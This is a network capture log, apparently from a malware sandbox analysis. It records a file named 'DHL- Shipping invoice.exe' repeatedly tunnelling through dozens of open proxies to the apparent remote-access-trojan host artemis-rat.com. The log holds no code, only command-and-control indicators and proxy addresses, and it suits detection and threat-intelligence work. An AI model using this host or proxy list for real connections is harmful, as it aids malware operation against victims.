                            Mar 12, 2024 08:37:00.803462029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.891876936 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            490192.168.2.451603184.178.172.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.808726072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            491192.168.2.451606184.178.172.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.808924913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            492192.168.2.451621212.110.188.220344096484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.815076113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.359143972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.062721968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.962728024 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            493192.168.2.451526147.75.92.244806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.815290928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.085726023 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3
                            Mar 12, 2024 08:37:01.118237972 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1c 0f e7 ef 94 64 12 4d cb 1b be 20 47 01 b0 44 c3 b2 a6 28 43 5b 68 c4 0f 9c f7 47 e8 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: edM GD(C[hG*,+0/$#('=<5/Uartemis-rat.com#


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            494192.168.2.451056199.102.106.9441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.816112041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            495192.168.2.45157979.110.196.14580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.819761992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            496192.168.2.451541103.146.137.7310816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.820426941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            497192.168.2.45158152.67.10.18331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.820652008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.020804882 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            498192.168.2.45163137.187.77.58293806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.833107948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.359230042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            499192.168.2.45084692.204.135.37338996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.840043068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            500192.168.2.451638134.209.189.42806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.840054989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.996104956 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            501192.168.2.451680104.21.194.182806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.840405941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.929878950 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            502192.168.2.451500175.183.82.22181976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.841289043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            503192.168.2.451548122.116.150.290006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.844841003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            504192.168.2.451782202.159.35.1534436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.856782913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            505192.168.2.45165098.181.137.8041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.857969046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            506192.168.2.451783202.159.35.1534436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.858428955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            507192.168.2.451784202.159.35.1534436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.860871077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            508192.168.2.45167151.15.242.20288886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.919575930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.359251022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            509192.168.2.45166146.17.63.16641546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.919575930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.088359118 CET339INHTTP/1.1 403 Forbidden
                            Server: squid/4.7
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 5
                            X-Squid-Error: TCP_RESET 0
                            Vary: Accept-Language
                            Content-Language: en
                            X-Cache: MISS from proxy.wakoopa.com
                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                            Connection: keep-alive
                            Data Raw: 72 65 73 65 74
                            Data Ascii: reset


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            510192.168.2.4515805.10.249.15910806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.920460939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            511192.168.2.45084098.162.25.4316546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.922283888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            512192.168.2.45094266.228.37.252294666484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.922712088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062532902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.063070059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062652111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:25.062896967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:37.062370062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.062304020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:13.062345982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:01.062504053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            513192.168.2.4509145.161.231.34806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.923197031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.018235922 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            514192.168.2.451538111.224.212.13680896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.923288107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            515192.168.2.451681132.148.167.243482986484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.923348904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.343544006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.901858091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.840910912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.640857935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471918106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            516192.168.2.451481102.69.177.126100816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.923355103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            517192.168.2.451658184.181.217.20141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.923746109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            518192.168.2.45155843.128.40.142655336484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.927731991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.238265991 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.20.1
                            Date: Tue, 12 Mar 2024 07:37:01 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            519192.168.2.451604121.159.146.251806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.931546926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            520192.168.2.451767172.65.165.93300006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.932528973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


